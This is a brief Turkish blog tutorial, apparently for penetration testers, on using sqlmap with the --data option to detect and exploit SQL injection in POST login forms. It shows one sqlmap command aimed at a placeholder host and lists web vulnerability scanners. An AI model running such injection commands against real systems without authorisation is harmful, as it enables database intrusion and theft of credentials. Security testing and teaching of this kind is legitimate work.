27 Temmuz 2021 Salı

POST SQL Injection




SQLMAP POST İNJECTION


Bir login ya da her hangi bir post edilebilecek yerde bulunan sql Injection zafiyetlerini tespit ve bunları exploit etmek için --data parametresiyle POST isteği yapıcaz.


sqlmap.py -u "http://test.com/test.php?test=login" --data="loginname=admin&loginpass=admin&duration=mins30" -p "loginname" --dbms="MySQL"

--forms komutu post bilgisini otomatik olarak çekmektedir.


POST bilgisini, hangi parametrenin test edileceğini (-p) ve DBMS bilgisini (--dbms) girdik.


Örnek İşe Yarar Videolar


https://www.youtube.com/watch?v=1gmhtzimPHo



https://www.youtube.com/watch?v=7PrUX2587A0



https://www.youtube.com/watch?v=1Qs195_8hNw


İşe Yarar Web Scanner Araçları


Acunetix

Net Sparker

Nessus

Openvas

0 comments:

Yorum Gönder